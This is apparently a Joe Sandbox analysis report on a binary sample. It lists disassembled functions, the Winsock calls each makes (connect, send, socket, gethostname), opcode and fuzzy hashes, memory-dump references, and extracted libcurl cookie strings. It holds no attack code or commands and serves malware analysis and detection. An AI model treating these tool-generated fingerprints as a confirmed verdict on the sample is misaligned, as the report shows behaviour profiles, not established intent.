                                          • Opcode ID: dc87bf86a80fe738df03937eaaa4302b629745aefe32c18ce92b9694bb523df3
                                          • Instruction ID: b86c3857122c1130bdfefe1ffe71d99824dee0fb2404aae582fcc60e25d9eeae
                                          • Opcode Fuzzy Hash: dc87bf86a80fe738df03937eaaa4302b629745aefe32c18ce92b9694bb523df3
                                          • Instruction Fuzzy Hash: 1231C2B49093059FCB40EFB8C5896AEBBF5AF45344F10892DE898AB201E734DA44CF52
                                          Function 0028B060 Relevance: 3.0, APIs: 2, Instructions: 48networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0028B29E,?,00000000,?,?), ref: 0028B0BA
                                          • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00273C41,00000000), ref: 0028B0C1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: ErrorLastconnect
                                          • String ID:
                                          • API String ID: 374722065-0
                                          • Opcode ID: 09ddcce59ceaaae2d652bb77f5bde63d59a8a164e202e755c13a06dceff3934d
                                          • Instruction ID: 9d3a669236b105ab96a9b53f157c28ab1963e5fe31b95319df812ff11cf4a66d
                                          • Opcode Fuzzy Hash: 09ddcce59ceaaae2d652bb77f5bde63d59a8a164e202e755c13a06dceff3934d
                                          • Instruction Fuzzy Hash: 1B012D393253019BCA216E248C44E67B395FF49364F140718F978531E0D726ED204752
                                          Function 00274950 Relevance: 1.7, APIs: 1, Instructions: 170networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • gethostname.WS2_32(00000000,00000040), ref: 00274AA5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: gethostname
                                          • String ID:
                                          • API String ID: 144339138-0
                                          • Opcode ID: 31b495ed8aa9d99e5b25fe1fb8011de54ceff3af4635d6f69bc4d9998bff0215
                                          • Instruction ID: 7ff9580c56561eefcc3dc35a0382291ce77939c53a7f8f55ddd89fdec06c5bd0
                                          • Opcode Fuzzy Hash: 31b495ed8aa9d99e5b25fe1fb8011de54ceff3af4635d6f69bc4d9998bff0215
                                          • Instruction Fuzzy Hash: 3451D070A243029BE730AF25DD4972776E4EF45318F14983DEA8E866D1E7B4EC64CB02
                                          Function 0028AF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                          Download Yara Rule
                                          APIs
                                          • getsockname.WS2_32(?,?,00000080), ref: 0028AFD1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: getsockname
                                          • String ID:
                                          • API String ID: 3358416759-0
                                          • Opcode ID: 3505f8b82db2846daadcd6b5ed855c0039a1c5dc1a32c4e92ac48bd22d543697
                                          • Instruction ID: 327d91ea79ec1157c7c5e1f51c18bb0048edbe5ffdbd71f1a39793db12a8a835
                                          • Opcode Fuzzy Hash: 3505f8b82db2846daadcd6b5ed855c0039a1c5dc1a32c4e92ac48bd22d543697
                                          • Instruction Fuzzy Hash: C6119670818785A6FB268F18D4027F6B3F4EFD0329F109619E59942550FB725AD68BC2
                                          Function 0028A920 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0028A97E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: send
                                          • String ID:
                                          • API String ID: 2809346765-0
                                          • Opcode ID: 923869342c4ffe665603665ab60ec15b90521d1795b203416f077662db15567e
                                          • Instruction ID: 052050131712b653c46a5a77cca01a005b20e7a7d062e5aa85704471456896ab
                                          • Opcode Fuzzy Hash: 923869342c4ffe665603665ab60ec15b90521d1795b203416f077662db15567e
                                          • Instruction Fuzzy Hash: 6601DB757117109FD714DF14DC45B56B7A5EF84720F05855EF9942B3A1C331AC108BD1
                                          Function 0028A8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                          Download Yara Rule
                                          APIs
                                          • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0027712E,?,?,?,00001001,00000000), ref: 0028A90C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: recvfrom
                                          • String ID:
                                          • API String ID: 846543921-0
                                          • Opcode ID: d6f0a957b995cc032b0954240493efd447f82c427c9846b38881ab10b6d7b514
                                          • Instruction ID: e37b901e79f657d2f39d639e97f77dbaa12cf441aaddc80579edff59576007db
                                          • Opcode Fuzzy Hash: d6f0a957b995cc032b0954240493efd447f82c427c9846b38881ab10b6d7b514
                                          • Instruction Fuzzy Hash: A7F06D79119308AFE220AE01DC44D6BBBEDEFC9754F05456DFD48232119670AE10CBB2
                                          Function 0028AF30 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • socket.WS2_32(?,0028B280,00000000,-00000001,00000000,0028B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0028AF66
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: socket
                                          • String ID:
                                          • API String ID: 98920635-0
                                          • Opcode ID: c27cf68987b76261d5aec51cc2480b201c90e68a4dec272736bd485bc401a67d
                                          • Instruction ID: 16c991ab2b667b24f817245c8bdf594e383e82a63dea567ec344d5e49e792378
                                          • Opcode Fuzzy Hash: c27cf68987b76261d5aec51cc2480b201c90e68a4dec272736bd485bc401a67d
                                          • Instruction Fuzzy Hash: 4EE06DB6A053216BD624DE1CE8449ABF3A9EFC4B20F044A4EFD5463204C730AC5087E2
                                          Function 0028B020 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • closesocket.WS2_32(?,00289422,?,?,?,?,?,?,?,?,?,?,?,w3',0069C880,00000000), ref: 0028B04D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: closesocket
                                          • String ID:
                                          • API String ID: 2781271927-0
                                          • Opcode ID: 539793663d100293ba9dafb71f089db94fa14fbbd145528d80b5df1ef8c4289c
                                          • Instruction ID: 871ac71bf0d6faadadbad7bb590a74f246cd80e2a993dd9ed49ca2db90c1cab6
                                          • Opcode Fuzzy Hash: 539793663d100293ba9dafb71f089db94fa14fbbd145528d80b5df1ef8c4289c
                                          • Instruction Fuzzy Hash: B4D0C2383002025BCA20EE14C884A5B732B7FC0714FACCB6CE02C8A190C73BDC538701
                                          Function 002267E0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                          Download Yara Rule
                                          APIs
                                          • ioctlsocket.WS2_32(?,8004667E,?,?,001FAF56,?,00000001), ref: 002267FB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: ioctlsocket
                                          • String ID:
                                          • API String ID: 3577187118-0
                                          • Opcode ID: d8fa34f3693b86296a7221c83b3a874f7223603639ff2174fd2e30c6c673c929
                                          • Instruction ID: bac9bb081ddea2c91e230323d3ed7998803d9b97f757228beda737514c1ad8b1
                                          • Opcode Fuzzy Hash: d8fa34f3693b86296a7221c83b3a874f7223603639ff2174fd2e30c6c673c929
                                          • Instruction Fuzzy Hash: E2C012F1109300AFC60C4724D855B2EB7D8DB44255F01491CB04692180EA349450CA1A

                                          Non-executed Functions

                                          Function 00201BE0 Relevance: 33.9, Strings: 26, Instructions: 1418COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                          • API String ID: 0-1371176463
                                          • Opcode ID: a15e825cee2f2815048d15c3d2a2c5599ea43efa8b443d34ff42ef5a4cd464ff
                                          • Instruction ID: 4df37c66111ed119a7a535b2422ba373385c7d9f049862468a2b1826a2ea2649
                                          • Opcode Fuzzy Hash: a15e825cee2f2815048d15c3d2a2c5599ea43efa8b443d34ff42ef5a4cd464ff
                                          • Instruction Fuzzy Hash: 47B24B70A18342EBD7209E24DC4AB66BBD5AF54704F08453EF889972D3EBB5DC28C752
                                          Function 0054E050 Relevance: 24.8, APIs: 10, Strings: 3, Instructions: 2082COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: localeconv
                                          • String ID: $d$nil)
                                          • API String ID: 3737801528-394766432
                                          • Opcode ID: 0f434fb03a7ae5e07fc318eb2c757738d4bf99afa080c828452d7a02073e8e68
                                          • Instruction ID: 336f62634ff496b42b9216ba7a38046f702cad154a2c054c3c9943651c1f1248
                                          • Opcode Fuzzy Hash: 0f434fb03a7ae5e07fc318eb2c757738d4bf99afa080c828452d7a02073e8e68
                                          • Instruction Fuzzy Hash: F7136B706087418FD720DF28C0956AABFE1BFC9358F24492DE9959B3A1D771EC49CB82
                                          Function 001E4F70 Relevance: 20.9, Strings: 16, Instructions: 911COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
